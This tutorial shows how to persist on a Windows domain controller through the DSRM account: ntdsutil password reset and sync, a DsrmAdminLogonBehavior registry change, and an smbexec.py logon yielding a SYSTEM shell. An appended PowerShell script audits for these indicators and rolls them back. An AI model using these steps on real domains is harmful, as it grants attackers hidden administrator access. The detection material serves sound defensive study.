Directory Services Restore Mode (DSRM) is a safe-mode boot option on Windows domain controllers. It lets an administrator restore, repair, or rebuild Active Directory when the domain environment has broken down. The DSRM account is simply the local Administrator account of the domain controller; its password hash is kept in the DC's local SAM rather than in NTDS.dit, so resetting domain account passwords does not touch it.
By default, the DSRM account cannot be used for RDP or any other remote logon to the domain controller; it is only usable when the DC is booted into DSRM.
Because the DSRM password is rarely changed and rarely audited, changing it and then changing the DSRM logon behavior gives an attacker a persistence foothold on the DC.
I. DSRM attack
1. Change the DSRM password
Run on the domain controller to change the DSRM password ("server null" means the local DC):
C:\Users\Administrator.SEC\Desktop\x64>ntdsutil
ntdsutil: set DSRM password
Reset DSRM Administrator Password: reset password on server null
Please type password for DS Restore Mode Administrator Account: *********
Please confirm new password: *********
Password has been set successfully.
Reset DSRM Administrator Password: q
ntdsutil: q
C:\Users\Administrator.SEC\Desktop\x64>
Change the DSRM logon behavior. The DsrmAdminLogonBehavior value under HKLM\System\CurrentControlSet\Control\Lsa controls when the DSRM account may log on: absent or 0 = only when the DC is booted into DSRM (default), 1 = also when the AD DS service is stopped, 2 = at any time, including while AD DS is running. The attack sets it to 2:
PS C:\Users\Administrator.SEC\Desktop\x64> New-ItemProperty "HKLM:\System\CurrentControlSet\Control\LSA\" -name "DSRMAdminlogonbehavior" -value 2 -propertyType DWORD
DSRMAdminlogonbehavior : 2
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control
PSChildName : LSA
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
Verification. With the logon behavior set to 2, the DSRM account (the DC's local administrator, targeted here as WIN2016-DC2/administrator with the password set above) authenticates over SMB while AD DS is running and yields a SYSTEM shell:
(base) ┌──(root㉿Kali)-[~]
└─# /root/.local/bin/smbexec.py WIN2016-DC2/administrator:"Az123456@"@10.10.4.7
/root/.local/share/uv/tools/impacket/lib/python3.12/site-packages/impacket/version.py:12: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Impacket v0.13.0.dev0+20250626.63631.6b8f6231 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
2. Synchronize the DSRM password from a specified domain user
Instead of typing a new password, ntdsutil can copy the password hash of a domain account (here the domain user hack) into the DSRM account, so the DSRM password becomes that user's current password. This is a one-time copy: if the domain user's password is changed later, the DSRM password keeps the old value.
C:\Users\Administrator.SEC\Desktop\x64>ntdsutil
ntdsutil: set DSRM password
Reset DSRM Administrator Password: sync from domain account hack
Password has been synchronized successfully.
Reset DSRM Administrator Password: q
ntdsutil: q
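The blue-team counterpart to both techniques above (password reset in section 1, password sync in section 2, and the network logon used for verification), as an added example that is not part of the original post: a PowerShell audit run on the DC that reads DsrmAdminLogonBehavior, looks for Security event 4794 (logged whenever the DSRM password is set or synced), looks for network logons of the DC's local Administrator, and optionally removes the registry value. The parameter names -Remediate and -DaysBack, the event-property indices, and the requirement that User Account Management and Logon auditing are enabled are assumptions of this example, not something the page states.

```powershell
# Added example, not code from the original post: audit a DC for the DSRM persistence
# indicators described above and optionally roll the registry change back.
# Assumptions (not from the page): run in an elevated PowerShell on the DC, User Account
# Management and Logon auditing are enabled, -Remediate/-DaysBack are names chosen here.
param(
    [switch]$Remediate,
    [int]$DaysBack = 30
)

$lsaKey    = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$valueName = 'DsrmAdminLogonBehavior'
$since     = (Get-Date).AddDays(-$DaysBack)
$findings  = @()

# 1. Logon behavior. Absent or 0 = DSRM account usable only when booted into DSRM (default),
#    1 = usable when the AD DS service is stopped, 2 = usable at any time (what the attack sets).
$behavior = (Get-ItemProperty -Path $lsaKey -ErrorAction Stop).$valueName
if ($null -eq $behavior) { $behavior = 0 }
switch ($behavior) {
    0       { Write-Output "[OK]    $valueName is 0 (default)" }
    1       { $findings += "$valueName is 1: DSRM account usable while AD DS is stopped" }
    2       { $findings += "$valueName is 2: DSRM account usable for network logon while AD DS runs" }
    default { $findings += "$valueName has unexpected value $behavior" }
}

# 2. DSRM password changed. Both 'reset password on server null' and 'sync from domain account'
#    in ntdsutil set the DSRM password, which the DC records as Security event 4794.
$pwEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4794; StartTime = $since } `
                         -ErrorAction SilentlyContinue
foreach ($e in $pwEvents) {
    $firstLine = ($e.Message -split "`r?`n")[0]
    $findings += "4794 at $($e.TimeCreated): $firstLine"
}

# 3. DSRM account used over the network. The DSRM account is the DC's local Administrator,
#    so its logons carry TargetDomainName = the DC host name (not the domain) in event 4624
#    with logon type 3, which is the footprint of the smbexec.py verification above.
#    Property indices for 4624: 5 = TargetUserName, 6 = TargetDomainName, 8 = LogonType, 18 = IpAddress.
$logons = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624; StartTime = $since } `
                       -ErrorAction SilentlyContinue |
    Where-Object {
        $_.Properties[5].Value -eq 'Administrator' -and
        $_.Properties[6].Value -eq $env:COMPUTERNAME -and
        $_.Properties[8].Value -eq 3
    }
foreach ($e in $logons) {
    $findings += "4624 network logon as local Administrator at $($e.TimeCreated) from $($e.Properties[18].Value)"
}

# 4. Report and optional rollback. Removing the value restores the default (0); the DSRM
#    password itself must still be reset with ntdsutil, since nothing here undoes that.
if ($findings.Count -eq 0) {
    Write-Output "[OK]    no DSRM persistence indicators in the last $DaysBack days"
} else {
    $findings | ForEach-Object { Write-Output "[ALERT] $_" }
}
if ($Remediate -and $behavior -ne 0) {
    Remove-ItemProperty -Path $lsaKey -Name $valueName -ErrorAction Stop
    Write-Output "[FIXED] removed $valueName; now reset the DSRM password with ntdsutil"
}
```

Save it as, for example, Find-DsrmPersistence.ps1 (a name chosen here) and run `.\Find-DsrmPersistence.ps1 -DaysBack 7` for a read-only check or add `-Remediate` to drop the registry value. Scanning every 4624 event on a busy DC is slow; on large logs, narrow -DaysBack or forward the events to a SIEM and apply the same three conditions there. If the DC's local Administrator has been renamed, adjust the TargetUserName comparison accordingly.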